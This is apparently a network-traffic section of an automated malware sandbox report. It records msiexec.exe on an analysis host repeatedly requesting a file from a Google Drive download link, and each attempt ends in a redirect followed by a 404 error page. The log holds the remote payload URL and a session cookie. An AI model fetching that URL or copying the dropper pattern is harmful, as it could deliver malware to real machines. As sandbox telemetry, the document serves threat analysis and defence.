                                                                    Date: Sat, 11 Jan 2025 02:09:00 GMT
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-hLedHVU96__ZeWHD_hLiWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 76 4f 75 58 79 5f 59 76 67 51 49 36 5f 48 49 56 63 4e 47 7a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jvOuXy_YvgQI6_HIVcNGzA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.649995216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:01 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:01 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:01 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: script-src 'nonce-MX82P1Hisy79oVKS0t-kgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.649997142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:02 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:02 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgQ-tKfMRuEQdnnFF7QRIVOa_P6icTjTqG5Ml-qicHRe_KMt9WkNN07-qK1i3wOQcXAra79gCtE
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:02 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-HaRabD7Fy40heglCo9695Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 53 4b 6f 6c 32 50 74 75 63 5a 31 48 36 66 69 31 55 7a 71 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SSKol2PtucZ1H6fi1Uzq1A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.649998216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:03 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:04 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:04 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-vSOSS-jutU3bGVgm6nCSqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.649999142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:04 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:05 UTC1844INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgSFiTvrky_OPF3K2xPo35YnJ1wssKCZQNAhQwvoI04yWOPVgJ0yoDVdZb2MX6ux4ZM7
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:05 GMT
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-X6e-y3LR0GferA64o65Gaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 4e 36 75 76 70 51 70 66 37 68 2d 58 45 75 47 49 5f 30 6c 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sN6uvpQpf7h-XEuGI_0leA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.650000216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:06 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:06 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:06 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-bQI7gkAGHL9xRvnYG9oztA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.650001142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:07 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:07 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgSmBxuVFba_G4a6WzZ25kMXng3pWzsd6ys_JxET9QLqaRWh7ekzExVgCKaIs6GYUq5GgTZR0ho
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:07 GMT
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-ZRQUhTXXa02TxOkI58e7YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:09:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 5f 4a 39 74 64 6c 78 43 63 70 4a 4b 32 31 6d 4c 35 56 4d 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U_J9tdlxCcpJK21mL5VMGQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.650002216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:08 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:08 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:09:08 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: script-src 'nonce-bOgQgmZl4QDUUAkqA3aAlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
